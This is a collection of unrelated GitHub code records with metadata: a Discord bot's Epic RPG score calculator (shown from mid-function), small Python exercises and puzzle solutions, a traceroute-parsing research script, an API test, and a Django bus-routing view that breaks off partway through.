{lbrare:,} {emojis.LB_RARE} = {score_lbrare:,.2f}\\n'\n f'{emojis.BP} {lbepic:,} {emojis.LB_EPIC} = {score_lbepic:,.2f}\\n'\n f'{emojis.BP} {lbedgy:,} {emojis.LB_EDGY} = {score_lbedgy:,.2f}\\n'\n f'{emojis.BP} {lbomega:,} {emojis.LB_OMEGA} = {score_lbomega:,.2f}\\n'\n f'{emojis.BP} {lbgodly:,} {emojis.LB_GODLY} = {score_lbgodly:,.2f}\\n'\n f'{emojis.BP} {lbvoid:,} {emojis.LB_VOID} = {score_lbvoid:,.2f}\\n'\n f'{emojis.BP} Total: **{score_lootboxes:,.2f}**\\n'\n )\n field_mobdrops = (\n f'{emojis.BP} {wolfskin:,} {emojis.WOLF_SKIN} = {score_wolfskin:,.2f}\\n'\n f'{emojis.BP} {zombieeye:,} {emojis.ZOMBIE_EYE} = {score_zombieeye:,.2f}\\n'\n f'{emojis.BP} {unicornhorn:,} {emojis.UNICORN_HORN} = {score_unicornhorn:,.2f}\\n'\n f'{emojis.BP} {mermaidhair:,} {emojis.MERMAID_HAIR} = {score_mermaidhair:,.2f}\\n'\n f'{emojis.BP} {chip:,} {emojis.CHIP} = {score_chip:,.2f}\\n'\n f'{emojis.BP} {dragonscale:,} 
{emojis.DRAGON_SCALE} = {score_dragonscale:,.2f}\\n'\n f'{emojis.BP} {darkenergy:,} {emojis.DARK_ENERGY} = {score_darkenergy:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_mobdrops:,.2f}**\\n'\n )\n field_farming = (\n f'{emojis.BP} {bread:,} {emojis.BREAD} = {score_bread:,.2f}\\n'\n f'{emojis.BP} {carrot:,} {emojis.CARROT} = {score_carrot:,.2f}\\n'\n f'{emojis.BP} {potato:,} {emojis.POTATO} = {score_potato:,.2f}\\n'\n f'{emojis.BP} {seed:,} {emojis.SEED} = {score_seed:,.2f}\\n'\n f'{emojis.BP} {seed_bread:,} {emojis.SEED_BREAD} = {score_seed_bread:,.2f}\\n'\n f'{emojis.BP} {seed_carrot:,} {emojis.SEED_CARROT} = {score_seed_carrot:,.2f}\\n'\n f'{emojis.BP} {seed_potato:,} {emojis.SEED_POTATO} = {score_seed_potato:,.2f}\\n'\n f'{emojis.BP} Total: **{score_farm_items:,.2f}**\\n'\n )\n embed = discord.Embed(\n color=settings.EMBED_COLOR,\n title='TIME JUMP SCORE CALCULATOR',\n description = (\n f'{emojis.BP} Your current area: **{message_area.capitalize()}**\\n'\n f'{emojis.BP} Inventory mode: **{option_inventory}**\\n'\n f'{emojis.BP} Stats mode: **{option_stats}**'\n ),\n )\n embed.add_field(name='LOOTBOXES', value=field_lootboxes, inline=True)\n embed.add_field(name='FARM ITEMS', value=field_farming, inline=True)\n embed.add_field(name='MOB DROPS', value=field_mobdrops, inline=True)\n\n if option_inventory in (INVENTORY_TRADE_A15, INVENTORY_TRADE_A16):\n areas = await database.get_all_areas()\n all_areas = {}\n for area in areas:\n all_areas[area.area_no] = area\n current_area = all_areas[area_no]\n\n loghyper = loghyper + (logultra * 8)\n logmega = logmega + (loghyper * 8)\n logsuper = logsuper + (logmega * 8)\n logepic = logepic + (logsuper * 8)\n log = log + (logepic * 20)\n fishgolden = fishgolden + (fishepic * 80)\n fish = fish + (fishgolden * 12)\n apple = apple + (banana * 12)\n\n original_area = area_no\n areas_best_changes = []\n\n # Get the amount of logs for the current area\n log = log + (fish * current_area.trade_fish_log)\n if not current_area.trade_apple_log == 0:\n log = log + (apple * current_area.trade_apple_log)\n apple = 0\n if not current_area.trade_ruby_log == 0:\n log = log + (ruby * current_area.trade_ruby_log)\n ruby = 0\n\n # Calculate the best trade rate for all areas\n for area in areas:\n area_no_next = area.area_no + 1\n if area_no_next != len(areas)+1:\n area_next = all_areas[area_no_next]\n else:\n area_next = None\n if area_next is not None:\n fish_rate_next = area_next.trade_fish_log\n apple_rate_next = area_next.trade_apple_log\n ruby_rate_next = area_next.trade_ruby_log\n if area.trade_fish_log != 0:\n fish_rate_change = fish_rate_next / area.trade_fish_log\n else:\n fish_rate_change = 0\n if area.trade_apple_log != 0:\n apple_rate_change = apple_rate_next / area.trade_apple_log\n else:\n apple_rate_change = 0\n if area.trade_ruby_log != 0:\n ruby_rate_change = ruby_rate_next / area.trade_ruby_log\n else:\n ruby_rate_change = 0\n else:\n fish_rate_change = 1\n apple_rate_change = 1\n ruby_rate_change = 1\n if (fish_rate_change <= 1) and (apple_rate_change <= 1) and (ruby_rate_change <= 1):\n best_change_index = 3\n else:\n all_changes = [fish_rate_change, apple_rate_change, ruby_rate_change]\n best_change = max(all_changes)\n best_change_index = all_changes.index(best_change)\n areas_best_changes.append(\n [area.area_no, best_change_index, area.trade_fish_log, area.trade_apple_log, area.trade_ruby_log]\n )\n if area_next is None: break\n\n # Get the amount of logs in each area\n areas_log_amounts = []\n trade_fish_rate_next = None\n 
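The trade simulation in this calculator first dismantles every log and fish tier downward, then converts fish, apples, and rubies to wooden logs at each area's trade rates before walking the best rate changes. A toy sketch of that dismantle-and-trade step; the dict keys and all rates here are invented, the real per-area tables come from the bot's database:

```python
def to_wooden_logs(inv, fish_log_rate, apple_log_rate, ruby_log_rate):
    hyper = inv['hyper'] + inv['ultra'] * 8     # each tier dismantles into 8
    mega = inv['mega'] + hyper * 8              # of the tier below...
    super_ = inv['super'] + mega * 8
    epic = inv['epic'] + super_ * 8
    logs = inv['wooden'] + epic * 20            # ...except EPIC -> wooden (x20)
    golden = inv['golden_fish'] + inv['epic_fish'] * 80
    fish = inv['normie_fish'] + golden * 12
    apples = inv['apple'] + inv['banana'] * 12
    logs += fish * fish_log_rate                # trade fish at the area rate
    if apple_log_rate:                          # apple/ruby trades only exist
        logs += apples * apple_log_rate         # in some areas (rate 0 = none)
    if ruby_log_rate:
        logs += inv['ruby'] * ruby_log_rate
    return logs

inv = dict(ultra=1, hyper=2, mega=0, super=5, epic=300, wooden=100_000,
           epic_fish=1, golden_fish=40, normie_fish=5_000,
           apple=900, banana=20, ruby=80)
print(to_wooden_logs(inv, fish_log_rate=2, apple_log_rate=0, ruby_log_rate=450))
```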
trade_apple_rate_next = None\n trade_ruby_rate_next = None\n for best_change in areas_best_changes[original_area-1:]:\n trade_area = best_change[0]\n trade_best_change = best_change[1]\n trade_fish_rate = best_change[2]\n trade_apple_rate = best_change[3]\n trade_ruby_rate = best_change[4]\n if not trade_area == len(areas_best_changes):\n next_area = areas_best_changes[trade_area]\n trade_fish_rate_next = next_area[2]\n trade_apple_rate_next = next_area[3]\n trade_ruby_rate_next = next_area[4]\n\n if not (trade_apple_rate_next == 0) and not (apple == 0):\n log = log + (apple * trade_apple_rate_next)\n apple = 0\n if not (trade_ruby_rate_next == 0) and not (ruby == 0):\n log = log + (ruby * trade_ruby_rate_next)\n ruby = 0\n\n if trade_area == original_area:\n areas_log_amounts.append([trade_area, log, trade_ruby_rate])\n\n if trade_best_change == 0:\n log = log / trade_fish_rate\n log = log * trade_fish_rate_next\n elif trade_best_change == 1:\n log = log / trade_apple_rate\n log = log * trade_apple_rate_next\n elif trade_best_change == 2:\n log = log / trade_ruby_rate\n log = log * trade_ruby_rate_next\n\n if not trade_area == len(areas_best_changes):\n areas_log_amounts.append([trade_area+1, log, trade_ruby_rate_next])\n\n a15 = a16 = (0,0,0)\n for log_amount in areas_log_amounts:\n if log_amount[0] == 15:\n a15 = log_amount\n elif log_amount[0] == 21:\n a16 = log_amount\n log_a15 = a15[1]\n ruby_rate_a15 = a15[2]\n try:\n ruby_a15 = floor(log_a15 / ruby_rate_a15)\n except ZeroDivisionError:\n ruby_a15 = 0\n log_a16 = a16[1]\n ruby_rate_a16 = a16[2]\n ruby_a16 = floor(log_a16 / ruby_rate_a16)\n\n if option_inventory == INVENTORY_TRADE_A15:\n ruby_str = f'{ruby_a15:,}' if ruby_a15 != 0 else 'N/A'\n score_ruby = ruby_a15 / 25\n else:\n ruby_str = f'{ruby_a16:,}'\n score_ruby = ruby_a16 / 25\n score_total_materials = score_ruby + score_logultimate + score_fishsuper + score_watermelon\n score_total += floor(score_total_materials)\n\n field_materials = (\n f'{emojis.BP} {ruby_str} {emojis.RUBY} = {score_ruby:,.2f}\\n'\n f'{emojis.BP} {logultimate:,} {emojis.LOG_ULTIMATE} = {score_logultimate:,.2f}\\n'\n f'{emojis.BP} {fishsuper:,} {emojis.FISH_SUPER} = {score_fishsuper:,.2f}\\n'\n f'{emojis.BP} {watermelon:,} {emojis.WATERMELON} = {score_watermelon:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_materials:,.2f}**\\n'\n )\n field_other = (\n f'{emojis.BP} {lifepotion:,} {emojis.LIFE_POTION} = {score_lifepotion:,.2f}\\n'\n f'{emojis.BP} {lottery_ticket} {emojis.LOTTERY_TICKET} = {score_lottery:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_other:,.2f}**\\n'\n )\n notes = (\n f'{emojis.BP} This calculation assumes that you trade **all** of your materials to rubies\\n'\n f'{emojis.BP} Materials you may still need for crafting gear are not subtracted'\n )\n embed.add_field(name='MATERIALS', value=field_materials, inline=True)\n embed.add_field(name='OTHER', value=field_other, inline=True)\n\n\n if option_inventory == INVENTORY_CURRENT:\n score_log = log / 25_000\n score_logepic = logepic / 2_500\n score_logsuper = logsuper / 250\n score_logmega = logmega / 25\n score_loghyper = loghyper / 2.5\n score_logultra = logultra * 4\n score_ruby = ruby / 25\n score_total_materials_1 = (\n score_log + score_logepic + score_logsuper + score_logmega + score_loghyper + score_logultra\n + score_logultimate + score_ruby\n )\n score_fish = fish / 25_000\n score_fishgolden = fishgolden / 1_250\n score_fishepic = fishepic / 12.5\n score_apple = apple / 5_000\n score_banana = banana / 250\n score_total_materials_2 
= (\n score_fish + score_fishgolden + score_fishepic + score_fishsuper + score_apple + score_banana\n + score_watermelon\n )\n score_total_materials = score_total_materials_1 + score_total_materials_2\n score_total_other = score_lifepotion + score_lottery\n score_total += floor(score_total_materials)\n\n field_materials_1 = (\n f'{emojis.BP} {log:,} {emojis.LOG} = {score_log:,.2f}\\n'\n f'{emojis.BP} {logepic:,} {emojis.LOG_EPIC} = {score_logepic:,.2f}\\n'\n f'{emojis.BP} {logsuper:,} {emojis.LOG_SUPER} = {score_logsuper:,.2f}\\n'\n f'{emojis.BP} {logmega:,} {emojis.LOG_MEGA} = {score_logmega:,.2f}\\n'\n f'{emojis.BP} {loghyper:,} {emojis.LOG_HYPER} = {score_loghyper:,.2f}\\n'\n f'{emojis.BP} {logultra:,} {emojis.LOG_ULTRA} = {score_logultra:,.2f}\\n'\n f'{emojis.BP} {logultimate:,} {emojis.LOG_ULTIMATE} = {score_logultimate:,.2f}\\n'\n f'{emojis.BP} {ruby:,} {emojis.RUBY} = {score_ruby:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_materials_1:,.2f}**\\n'\n )\n field_materials_2 = (\n f'{emojis.BP} {fish:,} {emojis.FISH} = {score_fish:,.2f}\\n'\n f'{emojis.BP} {fishgolden:,} {emojis.FISH_GOLDEN} = {score_fishgolden:,.2f}\\n'\n f'{emojis.BP} {fishepic:,} {emojis.FISH_EPIC} = {score_fishepic:,.2f}\\n'\n f'{emojis.BP} {fishsuper:,} {emojis.FISH_SUPER} = {score_fishsuper:,.2f}\\n'\n f'{emojis.BP} {apple:,} {emojis.APPLE} = {score_apple:,.2f}\\n'\n f'{emojis.BP} {banana:,} {emojis.BANANA} = {score_banana:,.2f}\\n'\n f'{emojis.BP} {watermelon:,} {emojis.WATERMELON} = {score_watermelon:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_materials_2:,.2f}**\\n'\n )\n field_other = (\n f'{emojis.BP} {lifepotion:,} {emojis.LIFE_POTION} = {score_lifepotion:,.2f}\\n'\n f'{emojis.BP} {lottery_ticket} {emojis.LOTTERY_TICKET} = {score_lottery:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_other:,.2f}**\\n'\n )\n notes = (\n f'{emojis.BP} This calculation shows your inventory as is\\n'\n f'{emojis.BP} Materials you may still need for crafting gear are not subtracted'\n )\n embed.add_field(name='MATERIALS (I)', value=field_materials_1, inline=True)\n embed.add_field(name='MATERIALS (II)', value=field_materials_2, inline=True)\n embed.add_field(name='OTHER', value=field_other, inline=True)\n\n if option_stats in (STATS_CURRENT, STATS_MANUAL):\n enchant_multipliers = {\n 'normie': 0.05,\n 'good': 0.15,\n 'great': 0.25,\n 'mega': 0.4,\n 'epic': 0.6,\n 'hyper': 0.7,\n 'ultimate': 0.8,\n 'perfect': 0.9,\n 'edgy': 0.95,\n 'ultra-edgy': 1,\n 'omega': 1.25,\n 'ultra-omega': 1.5,\n 'godly': 2,\n 'void': 3,\n }\n armor_enchant_multiplier = enchant_multipliers.get(profile_data['enchant_armor'].lower(), 0)\n sword_enchant_multiplier = enchant_multipliers.get(profile_data['enchant_sword'].lower(), 0)\n score_sword_enchant = sword_enchant_multiplier * 4\n score_armor_enchant = armor_enchant_multiplier * 4\n score_enchants = score_armor_enchant + score_sword_enchant\n\n if option_stats == STATS_CURRENT:\n at_multiplier = def_multiplier = life_multiplier = 1\n if profile_data['horse_type'] in ('magic', 'strong', 'defender', 'tank'):\n horse_data: database.Horse = await database.get_horse(profile_data['horse_tier'])\n horse_epicness_type_factor = 1 + profile_data['horse_epicness'] * 0.005\n if profile_data['horse_type'] == 'magic':\n horse_boost = horse_data.magic_level_bonus * profile_data['horse_level'] * horse_epicness_type_factor\n armor_enchant_multiplier *= 1 + horse_boost / 100\n sword_enchant_multiplier *= 1 + horse_boost / 100\n if profile_data['horse_type'] == 'strong':\n horse_boost = 
horse_data.strong_level_bonus * profile_data['horse_level'] * horse_epicness_type_factor\n at_multiplier += horse_boost / 100\n if profile_data['horse_type'] == 'defender':\n horse_boost = horse_data.def_level_bonus * profile_data['horse_level'] * horse_epicness_type_factor\n def_multiplier += horse_boost / 100\n if profile_data['horse_type'] == 'tank':\n horse_boost = horse_data.tank_level_bonus * profile_data['horse_level'] * horse_epicness_type_factor\n life_multiplier += horse_boost / 100\n base_at = functions.round_school(profile_data['at'] / (1 + sword_enchant_multiplier) / at_multiplier) - boosts_data['at']\n base_def = functions.round_school(profile_data['def'] / (1 + armor_enchant_multiplier) / def_multiplier) - boosts_data['def']\n base_life = functions.round_school(profile_data['life'] / life_multiplier) - boosts_data['life']\n else:\n sword_at = profile_data['sword'].stat_at if profile_data['sword'] is not None else 0\n armor_def = profile_data['armor'].stat_def if profile_data['armor'] is not None else 0\n base_at = profile_data['level'] + sword_at + profile_data['extra_at']\n base_def = profile_data['level'] + armor_def + profile_data['extra_def']\n base_life = 95 + (5 * profile_data['level']) + profile_data['extra_life']\n score_level = profile_data['level'] * 0.5\n score_at = base_at * 0.125\n score_def = base_def * 0.15\n score_life = base_life * (1 / 40)\n score_total_stats = score_at + score_def + score_life + score_level\n score_total += ceil(score_total_stats)\n field_stats = (\n f'{emojis.BP} {profile_data[\"level\"]:,} {emojis.STAT_LEVEL} = {score_level:,.2f}\\n'\n f'{emojis.BP} {base_at:,} {emojis.STAT_AT} = {score_at:,.2f}\\n'\n f'{emojis.BP} {base_def:,} {emojis.STAT_DEF} = {score_def:,.2f}\\n'\n f'{emojis.BP} {base_life:,} {emojis.STAT_LIFE} = {score_life:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_stats:,.2f}**\\n'\n )\n if profile_data['sword'] is not None:\n sword_item = profile_data['sword']\n sword = f'{sword_item.emoji} {sword_item.name} = {sword_item.score:,.2f}'\n score_sword = sword_item.score\n else:\n sword = 'No or unknown sword = 0.00'\n score_sword = 0\n if profile_data['armor'] is not None:\n armor_item = profile_data['armor']\n armor = f'{armor_item.emoji} {armor_item.name} = {armor_item.score:,.2f}'\n score_armor = armor_item.score\n else:\n armor = 'No or unknown armor = 0.00'\n score_armor = 0\n score_total_gear = score_enchants + score_armor + score_sword\n score_total += ceil(score_enchants) + score_armor + score_sword\n field_gear = (\n f'{emojis.BP} {sword}\\n'\n f'{emojis.DETAIL} {emojis.PR_ENCHANTER} {profile_data[\"enchant_sword\"]} enchant = '\n f'{score_sword_enchant:,.2f}\\n'\n f'{emojis.BP} {armor}\\n'\n f'{emojis.DETAIL} {emojis.PR_ENCHANTER} {profile_data[\"enchant_armor\"]} enchant = '\n f'{score_armor_enchant:,.2f}\\n'\n f'{emojis.BP} Total: **{score_total_gear:,.2f}**\\n'\n )\n score_total += 8 # Unknown base score coming from wherever\n notes = (\n f'{notes}\\n'\n f'{emojis.BP} This calculation shows an approximation of your full score\\n'\n f'{emojis.DETAIL} This might not always be 100% accurate!\\n'\n f'{emojis.DETAIL} An active quest adds 1 score which is not listed here'\n )\n embed.add_field(name='BASE STATS', value=field_stats, inline=True)\n embed.add_field(name='GEAR & ENCHANTS', value=field_gear, inline=True)\n\n field_totals = (\n f'{emojis.BP} Lootboxes & farm items: {score_total_lootboxes_farm_items:,.2f} ➜ {floor(score_total_lootboxes_farm_items)}\\n'\n f'{emojis.BP} Mob drops: {score_total_mobdrops:,.2f} ➜ 
{floor(score_total_mobdrops)}\\n'\n        f'{emojis.BP} Materials: {score_total_materials:,.2f} ➜ {floor(score_total_materials)}\\n'\n        f'{emojis.BP} Life potions: {score_lifepotion:,.2f} ➜ {ceil(score_lifepotion)}\\n'\n        f'{emojis.BP} Lottery tickets: {score_lottery:,.2f} ➜ {ceil(score_lottery)}'\n    )\n    if option_stats in (STATS_CURRENT, STATS_MANUAL):\n        field_totals = (\n            f'{emojis.BP} Base score: 8\\n'\n            f'{field_totals}\\n'\n            f'{emojis.BP} Stats: {score_total_stats:,.2f} ➜ {ceil(score_total_stats)}\\n'\n            f'{emojis.BP} Gear: {score_armor + score_sword:,.2f} ➜ {score_armor + score_sword:g}\\n'\n            f'{emojis.BP} Enchants: {score_enchants:,.2f} ➜ {ceil(score_enchants)}'\n        )\n    field_totals = (\n        f'{field_totals}\\n'\n        f'{emojis.BP} Total score {calculated_area}: **{score_total:,g}**\\n'\n    )\n    embed.description = (\n        f'{embed.description}\\n'\n        f'{emojis.BP} Total score: **{score_total:,g}**\\n'\n    )\n    embed.add_field(name='TOTALS', value=field_totals, inline=False)\n    embed.add_field(name='NOTE', value=notes, inline=False)\n\n    return embed","repo_name":"Miriel-py/Epic-RPG-Guide","sub_path":"content/timetravel.py","file_name":"timetravel.py","file_ext":"py","file_size_in_byte":61318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
{"seq_id":"32080286923","text":"# Напишите программу, которая принимает на вход цифру,\n# обозначающую день недели, и проверяет, является ли этот день выходным.\n\na = input('Введите число: ')\n\ndef day_of_week(a):\n    if a == 1:\n        print('Понедельник')\n    elif a == 2:\n        print('Вторник')\n    elif a == 3:\n        print('Среда')\n    elif a == 4:\n        print('Четверг')\n    elif a == 5:\n        print('Пятница')\n    elif a == 6:\n        print('Суббота')\n    elif a == 7:\n        print('Воскресенье')\n    return a\n\nif a.isdigit():\n    day_of_week(int(a))\nelse:\n    print('Введено неверное значение')\n\n","repo_name":"CaballeroSabio/PythonSeminars","sub_path":"lesson01/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"32600629860","text":"# https://leetcode.com/problems/count-primes/\n# O(n log log n) time, O(n) space\n\nfrom math import sqrt\n\nclass Solution:\n    def countPrimes(self, n: int) -> int:\n        if n < 2: \n            return 0\n        prime = [1] * n\n        prime[0] = 0\n        prime[1] = 0\n        \n        for i in range(2, int(sqrt(n))+1):\n            if prime[i]:\n                # Set all multiples of the integer to not prime\n                prime[i * i: n: i] = [0] * len(prime[i * i: n: i])\n        return sum(prime)\n","repo_name":"NoahTN/epi-workbook","sub_path":"5_arrays/5.9_count_primes.py","file_name":"5.9_count_primes.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"38629560085","text":"# my solution \ndirections = {\"NORTH\": \"SOUTH\", \"SOUTH\": \"NORTH\", \"EAST\": \"WEST\", \"WEST\": \"EAST\"}\ndef dirReduc(arr):\n    i = 0\n    while i < len(arr)-1:\n        current_item = arr[i]\n        if arr[i+1] == directions[current_item]:\n            arr.pop(i)\n            arr.pop(i)\n            i = 0\n        else:\n            i+=1\n    return arr\n\na = [\"NORTH\", \"SOUTH\", \"SOUTH\", \"EAST\", \"WEST\", \"NORTH\", \"WEST\"]\nassert dirReduc(a) == [\"WEST\"]\n\n\n# clever solution Python Recursion\ndef dirReduc(arr):\n    dir = \" \".join(arr)\n    dir2 = dir.replace(\"NORTH SOUTH\",'').replace(\"SOUTH NORTH\",'').replace(\"EAST WEST\",'').replace(\"WEST EAST\",'')\n    dir3 = dir2.split()\n    return dirReduc(dir3) if len(dir3) < len(arr) else dir3\n\n# https://www.codewars.com/kata/58223370aef9fc03fd000071/train/python\ndef 
dashatize(n):\n    print(n)\n    if not isinstance(n, int): return 'None'\n    if n < 0: n = abs(n)\n    arr =[]\n    for i in str(n):\n        if int(i) % 2 == 0:\n            arr.append(i)\n        else:\n            arr.append(\"-{}-\".format(i))\n    return (\"\".join(arr).replace(\"--\",\"-\").strip('-'))\n\n\ndashatize(974302)","repo_name":"Alhajsalem/codewars_challenges","sub_path":"python/5kyu_directions_reduction.py","file_name":"5kyu_directions_reduction.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"31160444297","text":"import json\nimport dns.resolver as dnsres\nimport dns.reversename as dnsrever\n\n# Opening JSON file\nf = open('../../result/CaseStudy/speedcheckerToSquatters.json', )\n\n# returns JSON object as\n# a dictionary\ndata = json.load(f)\n# print(len(data))\nset_of_internal_looking_ASes = []\nset_of_external_looking_ASes = []\nset_of_unresponsive = []\ndic_val = {}\nall_the_ases_considered = []\nind = 0\nfor t in data:\n    to_keep = []\n    rtt_list = []\n    list_of_dns = []\n    as_mapping = []\n    ind +=1\n    at_least_one_responsive = False\n    outside = False  # track whether any hop mapped outside this probe's ASN\n    # print(t['ASN'],t['Tracert'])\n    for s in t['Tracert']:\n        # print(s)\n        to_keep.append(s['IP'])\n        rtt_list.append(s['PingTime'])\n        as_mapping.append(s['ASN'])\n        all_the_ases_considered.append(s['ASN'])\n        # try:\n        #     domain_address = dnsrever.from_address(s['IP'])\n        #     dns = str(dnsres.query(domain_address, 'PTR')[0])\n        #     print(dns)\n        # except:\n        dns = ''\n        list_of_dns.append(dns)\n\n        # list_of_dns.append(s['HostName'])\n        if s['IP'] != '*':\n            # print(t['ASN'],s)\n            at_least_one_responsive = True\n            if t['ASN'] != s['ASN']:\n                # set_of_external_looking_ASes.append(t['ASN'])\n                outside = True\n                at_least_one_responsive = False\n    if outside:\n        set_of_internal_looking_ASes.append(t['ASN'])\n        # dic_val[ind] = [to_keep, rtt_list, as_mapping, list_of_dns]\n    elif at_least_one_responsive:\n        set_of_external_looking_ASes.append(t['ASN'])\n        dic_val[ind] = [to_keep, rtt_list, as_mapping,as_mapping, list_of_dns]\n    else:\n        set_of_unresponsive.append(t['ASN'])\n# [to_keep, rtt_list,new_mapping,as_mapping,list_of_dns]\nprint(len(set(set_of_internal_looking_ASes)))\nprint(len(set(set_of_external_looking_ASes)))\n# print(data)\nprint(list(set(set_of_unresponsive)))\nprint('Number of Probes in Speedchecker considered:')\nprint(len(list(set(set_of_unresponsive)))+len(set(set_of_internal_looking_ASes))+len(set(set_of_external_looking_ASes)))\n# print(dic_val)\nwith open(\"example_of_external_speedchecker.json\", 'w') as fout:\n    json_dumps_str = json.dumps(dic_val)\n    print(json_dumps_str, file=fout)\n","repo_name":"Burdantes/IPv4Squatting","sub_path":"scripts/CaseStudy/Parsing_Speedchecker.py","file_name":"Parsing_Speedchecker.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
{"seq_id":"26477641101","text":"from test.BaseCase import BaseCase\n\n\nclass TestUpdateContact(BaseCase):\n\n    @BaseCase.login\n    @BaseCase.grant_access(\"/contact/update_contact\")\n    def test_ok(self, token):\n        self.db.insert({\"id\": 2, \"name\": \"My Entity\"}, self.db.tables[\"Entity\"])\n        self.db.insert({\n            \"id\": 1,\n            \"entity_id\": 2,\n            \"type\": \"PHONE NUMBER\",\n            \"representative\": \"ENTITY\",\n            \"name\": None,\n            \"value\": \"+123456896\",\n        }, self.db.tables[\"EntityContact\"])\n\n        payload = {\n            \"id\": 1,\n            \"entity_id\": 2,\n            \"type\": \"EMAIL ADDRESS\",\n            \"representative\": \"ENTITY\",\n            \"name\": None,\n            \"value\": 
\"test@domain.com\",\n }\n\n response = self.application.post('/contact/update_contact',\n headers=self.get_standard_post_header(token),\n json=payload)\n\n contact = self.db.get(self.db.tables[\"EntityContact\"], {\"id\": 1})\n\n self.assertEqual(200, response.status_code)\n self.assertEqual(len(contact), 1)\n self.assertEqual(contact[0].type, \"EMAIL ADDRESS\")\n self.assertEqual(contact[0].representative, \"ENTITY\")\n self.assertEqual(contact[0].name, None)\n self.assertEqual(contact[0].value, \"test@domain.com\")\n","repo_name":"CybersecurityLuxembourg/openxeco-core","sub_path":"oxe-api/test/resource/contact/test_update_contact.py","file_name":"test_update_contact.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"14995037246","text":"import csv\nimport io\nimport json\nimport os\nimport math\n\nfrom decimal import *\n\nimport overpy\nfrom django.core import serializers\nfrom django.conf import settings\nfrom django.http import (Http404, HttpResponse, HttpResponseBadRequest,\n HttpResponseNotAllowed, JsonResponse)\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.clickjacking import xframe_options_exempt\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import viewsets, generics\n\nfrom haversine import haversine, haversine_vector, Unit\n\nfrom .models import Route, Stop, Journey, StopWeight, StopInfo, Feedback\nfrom .serializers import RouteSerializer, StopSerializer, JourneySerializer\n\n\nclass StopViewSet(viewsets.ModelViewSet):\n queryset = Stop.objects.all().order_by('name')\n serializer_class = StopSerializer\n\nclass RouteViewSet(viewsets.ModelViewSet):\n queryset = Route.objects.all().order_by('name')\n serializer_class = RouteSerializer\n\ndef upload_stops(request):\n stops_file_name = \"api/stops_dodoma.csv\"\n stops_file = open(os.path.join(settings.BASE_DIR, stops_file_name), \"r\")\n data_set = stops_file.read()\n io_string = io.StringIO(data_set)\n next(io_string)\n for col in csv.reader(io_string, delimiter=',', quotechar=\"|\"):\n _, created = Stop.objects.update_or_create(\n name=col[2],\n lat=col[3],\n lon=col[4]\n )\n return HttpResponse(\"Data set loaded\")\n\n@xframe_options_exempt\ndef get_route(request):\n if request.method != \"GET\":\n return HttpResponseNotAllowed(\"Methods other than GET not allowed\")\n\n start_stop = (request.GET['start_lat'],request.GET['start_lon'])\n final_stop = (request.GET['final_lat'],request.GET['final_lon'])\n\n from_loc = request.GET['from']\n to_loc = request.GET['to']\n \n if (start_stop == None) or (final_stop == None):\n return HttpResponseBadRequest(\"Start and/or Final stops not set\")\n\n overpassApi = overpy.Overpass()\n\n # fetch the real lat and lon\n start_stop, final_stop = getStartAndFinalStops(start_stop, overpassApi, final_stop)\n\n # find the origin route\n start_route = Route.objects.filter(bus_stops__lat=start_stop[0])\n start_route = start_route.filter(bus_stops__lon=start_stop[1]).first()\n\n # find the destination route\n final_route = Route.objects.filter(bus_stops__lat=final_stop[0])\n final_route = final_route.filter(bus_stops__lon=final_stop[1]).first()\n\n print(\"Start Route: \", start_route)\n print(\"Final Route: \", final_route)\n \n if (start_route == None) or (final_route == None):\n raise Http404(\"Start/Final Stop not in any route\")\n\n # the stops are in a route, calculate the waypoints\n common_stops = []\n mid_stop = None\n\n 
common_stops = start_route.bus_stops.filter(pk__in=final_route.bus_stops.all())\n mid_stop = common_stops[len(common_stops) - 1]\n multiple_routes = True if (common_stops.count() != start_route.bus_stops.count()) else False\n\n locations = []\n bus_stops = []\n\n routes = [start_route, final_route]\n start_cost = 0\n final_cost = 0\n cost = 0\n \n notify_stops = []\n notify_stops.append(start_route.bus_stops.all()[len(start_route.bus_stops.all()) - 1])\n if multiple_routes:\n start_stops = start_route.bus_stops.filter(\n stopinfo__weight=StopWeight.ROUTABLE\n ).all()\n stop = Stop.objects.get(lat=start_stop[0], lon=start_stop[1])\n s_stop_info = StopInfo.objects.get(route=start_route, stop=stop)\n if start_route.forward:\n start_bus_stops = \\\n start_stops.filter(stopinfo__order__gte=s_stop_info.order).distinct()\n else:\n start_bus_stops = \\\n reversed(\n start_stops.filter(stopinfo__order__lte=s_stop_info.order).distinct()\n )\n\n count = StopInfo.objects.filter(route=start_route).count()\n start_cost = calculate_cost(start_route, s_stop_info, count)\n\n final_stops = final_route.bus_stops.filter(\n stopinfo__weight=StopWeight.ROUTABLE\n ).all()\n stop = Stop.objects.get(lat=final_stop[0], lon=final_stop[1])\n f_stop_info = StopInfo.objects.get(route=final_route, stop=stop)\n print(final_stops)\n if final_route.forward:\n final_bus_stops = \\\n final_stops.filter(stopinfo__order__lte=f_stop_info.order).distinct()\n else:\n final_bus_stops = \\\n reversed(\n final_stops.filter(stopinfo__order__gte=f_stop_info.order).distinct())\n count = StopInfo.objects.filter(route=final_route).count()\n final_cost = calculate_cost(final_route, f_stop_info, count)\n\n cost = start_cost + final_cost\n\n bus_stops = []\n for s in start_bus_stops:\n bus_stops.append(s)\n\n locations.append([mid_stop.lat, mid_stop.lon])\n bus_stops.append(mid_stop)\n \n for s in final_bus_stops:\n bus_stops.append(s)\n\n 